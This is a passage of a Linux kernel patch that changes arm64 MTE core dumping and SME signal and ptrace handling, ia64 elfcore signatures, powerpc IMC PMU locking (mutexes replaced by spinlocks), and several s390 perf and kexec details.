+ 
+ 		/*
+@@ -65,7 +64,6 @@ static int mte_dump_tag_range(struct coredump_params *cprm,
+ 		mte_save_page_tags(page_address(page), tags);
+ 		put_page(page);
+ 		if (!dump_emit(cprm, tags, MTE_PAGE_TAG_STORAGE)) {
+-			mte_free_tag_storage(tags);
+ 			ret = 0;
+ 			break;
+ 		}
+@@ -77,13 +75,13 @@ static int mte_dump_tag_range(struct coredump_params *cprm,
+ 	return ret;
+ }
+ 
+-Elf_Half elf_core_extra_phdrs(void)
++Elf_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+-	struct vm_area_struct *vma;
++	int i;
++	struct core_vma_metadata *m;
+ 	int vma_count = 0;
+-	VMA_ITERATOR(vmi, current->mm, 0);
+ 
+-	for_each_mte_vma(vmi, vma)
++	for_each_mte_vma(cprm, i, m)
+ 		vma_count++;
+ 
+ 	return vma_count;
+@@ -91,18 +89,18 @@ Elf_Half elf_core_extra_phdrs(void)
+ 
+ int elf_core_write_extra_phdrs(struct coredump_params *cprm, loff_t offset)
+ {
+-	struct vm_area_struct *vma;
+-	VMA_ITERATOR(vmi, current->mm, 0);
++	int i;
++	struct core_vma_metadata *m;
+ 
+-	for_each_mte_vma(vmi, vma) {
++	for_each_mte_vma(cprm, i, m) {
+ 		struct elf_phdr phdr;
+ 
+ 		phdr.p_type = PT_AARCH64_MEMTAG_MTE;
+ 		phdr.p_offset = offset;
+-		phdr.p_vaddr = vma->vm_start;
++		phdr.p_vaddr = m->start;
+ 		phdr.p_paddr = 0;
+-		phdr.p_filesz = mte_vma_tag_dump_size(vma);
+-		phdr.p_memsz = vma->vm_end - vma->vm_start;
++		phdr.p_filesz = mte_vma_tag_dump_size(m);
++		phdr.p_memsz = m->end - m->start;
+ 		offset += phdr.p_filesz;
+ 		phdr.p_flags = 0;
+ 		phdr.p_align = 0;
+@@ -114,28 +112,25 @@ int elf_core_write_extra_phdrs(struct coredump_params *cprm, loff_t offset)
+ 	return 1;
+ }
+ 
+-size_t elf_core_extra_data_size(void)
++size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+-	struct vm_area_struct *vma;
++	int i;
++	struct core_vma_metadata *m;
+ 	size_t data_size = 0;
+-	VMA_ITERATOR(vmi, current->mm, 0);
+ 
+-	for_each_mte_vma(vmi, vma)
+-		data_size += mte_vma_tag_dump_size(vma);
++	for_each_mte_vma(cprm, i, m)
++		data_size += mte_vma_tag_dump_size(m);
+ 
+ 	return data_size;
+ }
+ 
+ int elf_core_write_extra_data(struct coredump_params *cprm)
+ {
+-	struct vm_area_struct *vma;
+-	VMA_ITERATOR(vmi, current->mm, 0);
+-
+-	for_each_mte_vma(vmi, vma) {
+-		if (vma->vm_flags & VM_DONTDUMP)
+-			continue;
++	int i;
++	struct core_vma_metadata *m;
+ 
+-		if (!mte_dump_tag_range(cprm, vma->vm_start, vma->vm_end))
++	for_each_mte_vma(cprm, i, m) {
++		if (!mte_dump_tag_range(cprm, m->start, m->dump_size))
+ 			return 0;
+ 	}
+ 
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index c2fb5755bbecb..92bc9a2d702cb 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -1364,7 +1364,7 @@ enum aarch64_regset {
+ #ifdef CONFIG_ARM64_SVE
+ 	REGSET_SVE,
+ #endif
+-#ifdef CONFIG_ARM64_SVE
++#ifdef CONFIG_ARM64_SME
+ 	REGSET_SSVE,
+ 	REGSET_ZA,
+ #endif
+diff --git a/arch/arm64/kernel/signal.c b/arch/arm64/kernel/signal.c
+index 9ad911f1647c8..43adbfa5ead78 100644
+--- a/arch/arm64/kernel/signal.c
++++ b/arch/arm64/kernel/signal.c
+@@ -280,7 +280,12 @@ static int restore_sve_fpsimd_context(struct user_ctxs *user)
+ 
+ 		vl = task_get_sme_vl(current);
+ 	} else {
+-		if (!system_supports_sve())
++		/*
++		 * A SME only system use SVE for streaming mode so can
++		 * have a SVE formatted context with a zero VL and no
++		 * payload data.
++		 */
++		if (!system_supports_sve() && !system_supports_sme())
+ 			return -EINVAL;
+ 
+ 		vl = task_get_sve_vl(current);
+@@ -729,7 +734,7 @@ static int setup_sigframe_layout(struct rt_sigframe_user_layout *user,
+ 			return err;
+ 	}
+ 
+-	if (system_supports_sve()) {
++	if (system_supports_sve() || system_supports_sme()) {
+ 		unsigned int vq = 0;
+ 
+ 		if (add_all || test_thread_flag(TIF_SVE) ||
+diff --git a/arch/ia64/kernel/elfcore.c b/arch/ia64/kernel/elfcore.c
+index 94680521fbf91..8895df1215404 100644
+--- a/arch/ia64/kernel/elfcore.c
++++ b/arch/ia64/kernel/elfcore.c
+@@ -7,7 +7,7 @@
+ #include <asm/elf.h>
+ 
+ 
+-Elf64_Half elf_core_extra_phdrs(void)
++Elf64_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+ 	return GATE_EHDR->e_phnum;
+ }
+@@ -60,7 +60,7 @@ int elf_core_write_extra_data(struct coredump_params *cprm)
+ 	return 1;
+ }
+ 
+-size_t elf_core_extra_data_size(void)
++size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+ 	const struct elf_phdr *const gate_phdrs =
+ 		(const struct elf_phdr *) (GATE_ADDR + GATE_EHDR->e_phoff);
+diff --git a/arch/powerpc/include/asm/imc-pmu.h b/arch/powerpc/include/asm/imc-pmu.h
+index 4f897993b7107..699a88584ae16 100644
+--- a/arch/powerpc/include/asm/imc-pmu.h
++++ b/arch/powerpc/include/asm/imc-pmu.h
+@@ -137,7 +137,7 @@ struct imc_pmu {
+  * are inited.
+  */
+ struct imc_pmu_ref {
+-	struct mutex lock;
++	spinlock_t lock;
+ 	unsigned int id;
+ 	int refc;
+ };
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index d517aba94d1bc..100e97daf76ba 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -14,6 +14,7 @@
+ #include <asm/cputhreads.h>
+ #include <asm/smp.h>
+ #include <linux/string.h>
++#include <linux/spinlock.h>
+ 
+ /* Nest IMC data structures and variables */
+ 
+@@ -21,7 +22,7 @@
+  * Used to avoid races in counting the nest-pmu units during hotplug
+  * register and unregister
+  */
+-static DEFINE_MUTEX(nest_init_lock);
++static DEFINE_SPINLOCK(nest_init_lock);
+ static DEFINE_PER_CPU(struct imc_pmu_ref *, local_nest_imc_refc);
+ static struct imc_pmu **per_nest_pmu_arr;
+ static cpumask_t nest_imc_cpumask;
+@@ -50,7 +51,7 @@ static int trace_imc_mem_size;
+  * core and trace-imc
+  */
+ static struct imc_pmu_ref imc_global_refc = {
+-	.lock = __MUTEX_INITIALIZER(imc_global_refc.lock),
++	.lock = __SPIN_LOCK_INITIALIZER(imc_global_refc.lock),
+ 	.id = 0,
+ 	.refc = 0,
+ };
+@@ -400,7 +401,7 @@ static int ppc_nest_imc_cpu_offline(unsigned int cpu)
+ 				       get_hard_smp_processor_id(cpu));
+ 		/*
+ 		 * If this is the last cpu in this chip then, skip the reference
+-		 * count mutex lock and make the reference count on this chip zero.
++		 * count lock and make the reference count on this chip zero.
+ 		 */
+ 		ref = get_nest_pmu_ref(cpu);
+ 		if (!ref)
+@@ -462,15 +463,15 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 	/*
+ 	 * See if we need to disable the nest PMU.
+ 	 * If no events are currently in use, then we have to take a
+-	 * mutex to ensure that we don't race with another task doing
++	 * lock to ensure that we don't race with another task doing
+ 	 * enable or disable the nest counters.
+ 	 */
+ 	ref = get_nest_pmu_ref(event->cpu);
+ 	if (!ref)
+ 		return;
+ 
+-	/* Take the mutex lock for this node and then decrement the reference count */
+-	mutex_lock(&ref->lock);
++	/* Take the lock for this node and then decrement the reference count */
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		/*
+ 		 * The scenario where this is true is, when perf session is
+@@ -482,7 +483,7 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 		 * an OPAL call to disable the engine in that node.
+ 		 *
+ 		 */
+-		mutex_unlock(&ref->lock);
++		spin_unlock(&ref->lock);
+ 		return;
+ 	}
+ 	ref->refc--;
+@@ -490,7 +491,7 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 		rc = opal_imc_counters_stop(OPAL_IMC_COUNTERS_NEST,
+ 					    get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("nest-imc: Unable to stop the counters for core %d\n", node_id);
+ 			return;
+ 		}
+@@ -498,7 +499,7 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 		WARN(1, "nest-imc: Invalid event reference count\n");
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ }
+ 
+ static int nest_imc_event_init(struct perf_event *event)
+@@ -557,26 +558,25 @@ static int nest_imc_event_init(struct perf_event *event)
+ 
+ 	/*
+ 	 * Get the imc_pmu_ref struct for this node.
+-	 * Take the mutex lock and then increment the count of nest pmu events
+-	 * inited.
++	 * Take the lock and then increment the count of nest pmu events inited.
+ 	 */
+ 	ref = get_nest_pmu_ref(event->cpu);
+ 	if (!ref)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		rc = opal_imc_counters_start(OPAL_IMC_COUNTERS_NEST,
+ 					     get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("nest-imc: Unable to start the counters for node %d\n",
+ 									node_id);
+ 			return rc;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	event->destroy = nest_imc_counters_release;
+ 	return 0;
+@@ -612,9 +612,8 @@ static int core_imc_mem_init(int cpu, int size)
+ 		return -ENOMEM;
+ 	mem_info->vbase = page_address(page);
+ 
+-	/* Init the mutex */
+ 	core_imc_refc[core_id].id = core_id;
+-	mutex_init(&core_imc_refc[core_id].lock);
++	spin_lock_init(&core_imc_refc[core_id].lock);
+ 
+ 	rc = opal_imc_counters_init(OPAL_IMC_COUNTERS_CORE,
+ 				__pa((void *)mem_info->vbase),
+@@ -703,9 +702,8 @@ static int ppc_core_imc_cpu_offline(unsigned int cpu)
+ 		perf_pmu_migrate_context(&core_imc_pmu->pmu, cpu, ncpu);
+ 	} else {
+ 		/*
+-		 * If this is the last cpu in this core then, skip taking refernce
+-		 * count mutex lock for this core and directly zero "refc" for
+-		 * this core.
++		 * If this is the last cpu in this core then skip taking reference
++		 * count lock for this core and directly zero "refc" for this core.
+ 		 */
+ 		opal_imc_counters_stop(OPAL_IMC_COUNTERS_CORE,
+ 				       get_hard_smp_processor_id(cpu));
+@@ -720,11 +718,11 @@ static int ppc_core_imc_cpu_offline(unsigned int cpu)
+ 		 * last cpu in this core and core-imc event running
+ 		 * in this cpu.
+ 		 */
+-		mutex_lock(&imc_global_refc.lock);
++		spin_lock(&imc_global_refc.lock);
+ 		if (imc_global_refc.id == IMC_DOMAIN_CORE)
+ 			imc_global_refc.refc--;
+ 
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 	}
+ 	return 0;
+ }
+@@ -739,7 +737,7 @@ static int core_imc_pmu_cpumask_init(void)
+ 
+ static void reset_global_refc(struct perf_event *event)
+ {
+-		mutex_lock(&imc_global_refc.lock);
++		spin_lock(&imc_global_refc.lock);
+ 		imc_global_refc.refc--;
+ 
+ 		/*
+@@ -751,7 +749,7 @@ static void reset_global_refc(struct perf_event *event)
+ 			imc_global_refc.refc = 0;
+ 			imc_global_refc.id = 0;
+ 		}
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ }
+ 
+ static void core_imc_counters_release(struct perf_event *event)
+@@ -764,17 +762,17 @@ static void core_imc_counters_release(struct perf_event *event)
+ 	/*
+ 	 * See if we need to disable the IMC PMU.
+ 	 * If no events are currently in use, then we have to take a
+-	 * mutex to ensure that we don't race with another task doing
++	 * lock to ensure that we don't race with another task doing
+ 	 * enable or disable the core counters.
+ 	 */
+ 	core_id = event->cpu / threads_per_core;
+ 
+-	/* Take the mutex lock and decrement the refernce count for this core */
++	/* Take the lock and decrement the refernce count for this core */
+ 	ref = &core_imc_refc[core_id];
+ 	if (!ref)
+ 		return;
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		/*
+ 		 * The scenario where this is true is, when perf session is
+@@ -786,7 +784,7 @@ static void core_imc_counters_release(struct perf_event *event)
+ 		 * an OPAL call to disable the engine in that core.
+ 		 *
+ 		 */
+-		mutex_unlock(&ref->lock);
++		spin_unlock(&ref->lock);
+ 		return;
+ 	}
+ 	ref->refc--;
+@@ -794,7 +792,7 @@ static void core_imc_counters_release(struct perf_event *event)
+ 		rc = opal_imc_counters_stop(OPAL_IMC_COUNTERS_CORE,
+ 					    get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("IMC: Unable to stop the counters for core %d\n", core_id);
+ 			return;
+ 		}
+@@ -802,7 +800,7 @@ static void core_imc_counters_release(struct perf_event *event)
+ 		WARN(1, "core-imc: Invalid event reference count\n");
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	reset_global_refc(event);
+ }
+@@ -840,7 +838,6 @@ static int core_imc_event_init(struct perf_event *event)
+ 	if ((!pcmi->vbase))
+ 		return -ENODEV;
+ 
+-	/* Get the core_imc mutex for this core */
+ 	ref = &core_imc_refc[core_id];
+ 	if (!ref)
+ 		return -EINVAL;
+@@ -848,22 +845,22 @@ static int core_imc_event_init(struct perf_event *event)
+ 	/*
+ 	 * Core pmu units are enabled only when it is used.
+ 	 * See if this is triggered for the first time.
+-	 * If yes, take the mutex lock and enable the core counters.
++	 * If yes, take the lock and enable the core counters.
+ 	 * If not, just increment the count in core_imc_refc struct.
+ 	 */
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		rc = opal_imc_counters_start(OPAL_IMC_COUNTERS_CORE,
+ 					     get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("core-imc: Unable to start the counters for core %d\n",
+ 									core_id);
+ 			return rc;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	/*
+ 	 * Since the system can run either in accumulation or trace-mode
+@@ -874,7 +871,7 @@ static int core_imc_event_init(struct perf_event *event)
+ 	 * to know whether any other trace/thread imc
+ 	 * events are running.
+ 	 */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == 0 || imc_global_refc.id == IMC_DOMAIN_CORE) {
+ 		/*
+ 		 * No other trace/thread imc events are running in
+@@ -883,10 +880,10 @@ static int core_imc_event_init(struct perf_event *event)
+ 		imc_global_refc.id = IMC_DOMAIN_CORE;
+ 		imc_global_refc.refc++;
+ 	} else {
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 		return -EBUSY;
+ 	}
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	event->hw.event_base = (u64)pcmi->vbase + (config & IMC_EVENT_OFFSET_MASK);
+ 	event->destroy = core_imc_counters_release;
+@@ -958,10 +955,10 @@ static int ppc_thread_imc_cpu_offline(unsigned int cpu)
+ 	mtspr(SPRN_LDBAR, (mfspr(SPRN_LDBAR) & (~(1UL << 63))));
+ 
+ 	/* Reduce the refc if thread-imc event running on this cpu */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == IMC_DOMAIN_THREAD)
+ 		imc_global_refc.refc--;
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	return 0;
+ }
+@@ -1001,7 +998,7 @@ static int thread_imc_event_init(struct perf_event *event)
+ 	if (!target)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	/*
+ 	 * Check if any other trace/core imc events are running in the
+ 	 * system, if not set the global id to thread-imc.
+@@ -1010,10 +1007,10 @@ static int thread_imc_event_init(struct perf_event *event)
+ 		imc_global_refc.id = IMC_DOMAIN_THREAD;
+ 		imc_global_refc.refc++;
+ 	} else {
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 		return -EBUSY;
+ 	}
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	event->pmu->task_ctx_nr = perf_sw_context;
+ 	event->destroy = reset_global_refc;
+@@ -1135,25 +1132,25 @@ static int thread_imc_event_add(struct perf_event *event, int flags)
+ 	/*
+ 	 * imc pmus are enabled only when it is used.
+ 	 * See if this is triggered for the first time.
+-	 * If yes, take the mutex lock and enable the counters.
++	 * If yes, take the lock and enable the counters.
+ 	 * If not, just increment the count in ref count struct.
+ 	 */
+ 	ref = &core_imc_refc[core_id];
+ 	if (!ref)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_start(OPAL_IMC_COUNTERS_CORE,
+ 		    get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("thread-imc: Unable to start the counter\
+ 				for core %d\n", core_id);
+ 			return -EINVAL;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 	return 0;
+ }
+ 
+@@ -1170,12 +1167,12 @@ static void thread_imc_event_del(struct perf_event *event, int flags)
+ 		return;
+ 	}
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	ref->refc--;
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_stop(OPAL_IMC_COUNTERS_CORE,
+ 		    get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("thread-imc: Unable to stop the counters\
+ 				for core %d\n", core_id);
+ 			return;
+@@ -1183,7 +1180,7 @@ static void thread_imc_event_del(struct perf_event *event, int flags)
+ 	} else if (ref->refc < 0) {
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	/* Set bit 0 of LDBAR to zero, to stop posting updates to memory */
+ 	mtspr(SPRN_LDBAR, (mfspr(SPRN_LDBAR) & (~(1UL << 63))));
+@@ -1224,9 +1221,8 @@ static int trace_imc_mem_alloc(int cpu_id, int size)
+ 		}
+ 	}
+ 
+-	/* Init the mutex, if not already */
+ 	trace_imc_refc[core_id].id = core_id;
+-	mutex_init(&trace_imc_refc[core_id].lock);
++	spin_lock_init(&trace_imc_refc[core_id].lock);
+ 
+ 	mtspr(SPRN_LDBAR, 0);
+ 	return 0;
+@@ -1246,10 +1242,10 @@ static int ppc_trace_imc_cpu_offline(unsigned int cpu)
+ 	 * Reduce the refc if any trace-imc event running
+ 	 * on this cpu.
+ 	 */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == IMC_DOMAIN_TRACE)
+ 		imc_global_refc.refc--;
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	return 0;
+ }
+@@ -1371,17 +1367,17 @@ static int trace_imc_event_add(struct perf_event *event, int flags)
+ 	}
+ 
+ 	mtspr(SPRN_LDBAR, ldbar_value);
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_start(OPAL_IMC_COUNTERS_TRACE,
+ 				get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("trace-imc: Unable to start the counters for core %d\n", core_id);
+ 			return -EINVAL;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 	return 0;
+ }
+ 
+@@ -1414,19 +1410,19 @@ static void trace_imc_event_del(struct perf_event *event, int flags)
+ 		return;
+ 	}
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	ref->refc--;
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_stop(OPAL_IMC_COUNTERS_TRACE,
+ 				get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("trace-imc: Unable to stop the counters for core %d\n", core_id);
+ 			return;
+ 		}
+ 	} else if (ref->refc < 0) {
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	trace_imc_event_stop(event, flags);
+ }
+@@ -1448,7 +1444,7 @@ static int trace_imc_event_init(struct perf_event *event)
+ 	 * no other thread is running any core/thread imc
+ 	 * events
+ 	 */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == 0 || imc_global_refc.id == IMC_DOMAIN_TRACE) {
+ 		/*
+ 		 * No core/thread imc events are running in the
+@@ -1457,10 +1453,10 @@ static int trace_imc_event_init(struct perf_event *event)
+ 		imc_global_refc.id = IMC_DOMAIN_TRACE;
+ 		imc_global_refc.refc++;
+ 	} else {
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 		return -EBUSY;
+ 	}
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	event->hw.idx = -1;
+ 
+@@ -1533,10 +1529,10 @@ static int init_nest_pmu_ref(void)
+ 	i = 0;
+ 	for_each_node(nid) {
+ 		/*
+-		 * Mutex lock to avoid races while tracking the number of
++		 * Take the lock to avoid races while tracking the number of
+ 		 * sessions using the chip's nest pmu units.
+ 		 */
+-		mutex_init(&nest_imc_refc[i].lock);
++		spin_lock_init(&nest_imc_refc[i].lock);
+ 
+ 		/*
+ 		 * Loop to init the "id" with the node_id. Variable "i" initialized to
+@@ -1633,7 +1629,7 @@ static void imc_common_mem_free(struct imc_pmu *pmu_ptr)
+ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ {
+ 	if (pmu_ptr->domain == IMC_DOMAIN_NEST) {
+-		mutex_lock(&nest_init_lock);
++		spin_lock(&nest_init_lock);
+ 		if (nest_pmus == 1) {
+ 			cpuhp_remove_state(CPUHP_AP_PERF_POWERPC_NEST_IMC_ONLINE);
+ 			kfree(nest_imc_refc);
+@@ -1643,7 +1639,7 @@ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ 
+ 		if (nest_pmus > 0)
+ 			nest_pmus--;
+-		mutex_unlock(&nest_init_lock);
++		spin_unlock(&nest_init_lock);
+ 	}
+ 
+ 	/* Free core_imc memory */
+@@ -1800,11 +1796,11 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 		* rest. To handle the cpuhotplug callback unregister, we track
+ 		* the number of nest pmus in "nest_pmus".
+ 		*/
+-		mutex_lock(&nest_init_lock);
++		spin_lock(&nest_init_lock);
+ 		if (nest_pmus == 0) {
+ 			ret = init_nest_pmu_ref();
+ 			if (ret) {
+-				mutex_unlock(&nest_init_lock);
++				spin_unlock(&nest_init_lock);
+ 				kfree(per_nest_pmu_arr);
+ 				per_nest_pmu_arr = NULL;
+ 				goto err_free_mem;
+@@ -1812,7 +1808,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			/* Register for cpu hotplug notification. */
+ 			ret = nest_pmu_cpumask_init();
+ 			if (ret) {
+-				mutex_unlock(&nest_init_lock);
++				spin_unlock(&nest_init_lock);
+ 				kfree(nest_imc_refc);
+ 				kfree(per_nest_pmu_arr);
+ 				per_nest_pmu_arr = NULL;
+@@ -1820,7 +1816,7 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 			}
+ 		}
+ 		nest_pmus++;
+-		mutex_unlock(&nest_init_lock);
++		spin_unlock(&nest_init_lock);
+ 		break;
+ 	case IMC_DOMAIN_CORE:
+ 		ret = core_imc_pmu_cpumask_init();
+diff --git a/arch/s390/include/asm/cpu_mf.h b/arch/s390/include/asm/cpu_mf.h
+index feaba12dbecb8..efa103b52a1a1 100644
+--- a/arch/s390/include/asm/cpu_mf.h
++++ b/arch/s390/include/asm/cpu_mf.h
+@@ -131,19 +131,21 @@ struct hws_combined_entry {
+ 	struct hws_diag_entry	diag;	/* Diagnostic-sampling data entry */
+ } __packed;
+ 
+-struct hws_trailer_entry {
+-	union {
+-		struct {
+-			unsigned int f:1;	/* 0 - Block Full Indicator   */
+-			unsigned int a:1;	/* 1 - Alert request control  */
+-			unsigned int t:1;	/* 2 - Timestamp format	      */
+-			unsigned int :29;	/* 3 - 31: Reserved	      */
+-			unsigned int bsdes:16;	/* 32-47: size of basic SDE   */
+-			unsigned int dsdes:16;	/* 48-63: size of diagnostic SDE */
+-		};
+-		unsigned long long flags;	/* 0 - 63: All indicators     */
++union hws_trailer_header {
++	struct {
++		unsigned int f:1;	/* 0 - Block Full Indicator   */
++		unsigned int a:1;	/* 1 - Alert request control  */
++		unsigned int t:1;	/* 2 - Timestamp format	      */
++		unsigned int :29;	/* 3 - 31: Reserved	      */
++		unsigned int bsdes:16;	/* 32-47: size of basic SDE   */
++		unsigned int dsdes:16;	/* 48-63: size of diagnostic SDE */
++		unsigned long long overflow; /* 64 - Overflow Count   */
+ 	};
+-	unsigned long long overflow;	 /* 64 - sample Overflow count	      */
++	__uint128_t val;
++};
++
++struct hws_trailer_entry {
++	union hws_trailer_header header; /* 0 - 15 Flags + Overflow Count     */
+ 	unsigned char timestamp[16];	 /* 16 - 31 timestamp		      */
+ 	unsigned long long reserved1;	 /* 32 -Reserved		      */
+ 	unsigned long long reserved2;	 /*				      */
+@@ -290,14 +292,11 @@ static inline unsigned long sample_rate_to_freq(struct hws_qsi_info_block *qsi,
+ 	return USEC_PER_SEC * qsi->cpu_speed / rate;
+ }
+ 
+-#define SDB_TE_ALERT_REQ_MASK	0x4000000000000000UL
+-#define SDB_TE_BUFFER_FULL_MASK 0x8000000000000000UL
+-
+ /* Return TOD timestamp contained in an trailer entry */
+ static inline unsigned long long trailer_timestamp(struct hws_trailer_entry *te)
+ {
+ 	/* TOD in STCKE format */
+-	if (te->t)
++	if (te->header.t)
+ 		return *((unsigned long long *) &te->timestamp[1]);
+ 
+ 	/* TOD in STCK format */
+diff --git a/arch/s390/include/asm/percpu.h b/arch/s390/include/asm/percpu.h
+index cb5fc06904354..081837b391e35 100644
+--- a/arch/s390/include/asm/percpu.h
++++ b/arch/s390/include/asm/percpu.h
+@@ -31,7 +31,7 @@
+ 	pcp_op_T__ *ptr__;						\
+ 	preempt_disable_notrace();					\
+ 	ptr__ = raw_cpu_ptr(&(pcp));					\
+-	prev__ = *ptr__;						\
++	prev__ = READ_ONCE(*ptr__);					\
+ 	do {								\
+ 		old__ = prev__;						\
+ 		new__ = old__ op (val);					\
+diff --git a/arch/s390/kernel/machine_kexec_file.c b/arch/s390/kernel/machine_kexec_file.c
+index fc6d5f58debeb..2df94d32140c4 100644
+--- a/arch/s390/kernel/machine_kexec_file.c
++++ b/arch/s390/kernel/machine_kexec_file.c
+@@ -187,8 +187,6 @@ static int kexec_file_add_ipl_report(struct kimage *image,
+ 
+ 	data->memsz = ALIGN(data->memsz, PAGE_SIZE);
+ 	buf.mem = data->memsz;
+-	if (image->type == KEXEC_TYPE_CRASH)
+-		buf.mem += crashk_res.start;
+ 
+ 	ptr = (void *)ipl_cert_list_addr;
+ 	end = ptr + ipl_cert_list_size;
+@@ -225,6 +223,9 @@ static int kexec_file_add_ipl_report(struct kimage *image,
+ 		data->kernel_buf + offsetof(struct lowcore, ipl_parmblock_ptr);
+ 	*lc_ipl_parmblock_ptr = (__u32)buf.mem;
+ 
++	if (image->type == KEXEC_TYPE_CRASH)
++		buf.mem += crashk_res.start;
++
+ 	ret = kexec_add_buffer(&buf);
+ out:
+ 	return ret;
+diff --git a/arch/s390/kernel/perf_cpum_sf.c b/arch/s390/kernel/perf_cpum_sf.c
+index 332a499651308..ce886a03545ae 100644
+--- a/arch/s390/kernel/perf_cpum_sf.c
++++ b/arch/s390/kernel/perf_cpum_sf.c
+@@ -163,14 +163,15 @@ static void free_sampling_buffer(struct sf_buffer *sfb)
+ 
+ static int alloc_sample_data_block(unsigned long *sdbt, gfp_t gfp_flags)
+ {
+-	unsigned long sdb, *trailer;
++	struct hws_trailer_entry *te;
++	unsigned long sdb;
+ 
+ 	/* Allocate and initialize sample-data-block */
+ 	sdb = get_zeroed_page(gfp_flags);
+ 	if (!sdb)
+ 		return -ENOMEM;
+-	trailer = trailer_entry_ptr(sdb);
